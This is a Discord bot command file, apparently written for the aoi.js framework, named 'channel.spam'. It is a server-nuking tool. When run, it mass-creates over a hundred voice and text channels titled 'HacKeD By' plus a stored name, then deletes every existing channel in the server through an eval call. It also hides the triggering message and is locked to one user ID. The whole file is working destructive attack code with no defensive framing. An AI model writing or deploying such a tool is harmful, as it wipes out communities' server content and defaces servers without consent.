module.exports = {
  name:"channel.spam",
  code:`
           $createChannel[$guildid;$getVar[ghostt];Text]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Voice;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $createChannel[$guildid;HacKeD By $getVar[ghostt];Text;$channelID[$getVar[ghostt]]]
  $djsEval[message.guild.channels.cache.filter(channel => channel).map(channel => channel.delete(channel))]
  $sendMessage[
  104 Channel Created :white_check_mark:
  $channelCount Channel Deleted :white_check_mark:
  Wait... ⌛;no]  
  $deletecommand
  $onlyforids[$getvar[id];]
  `
}
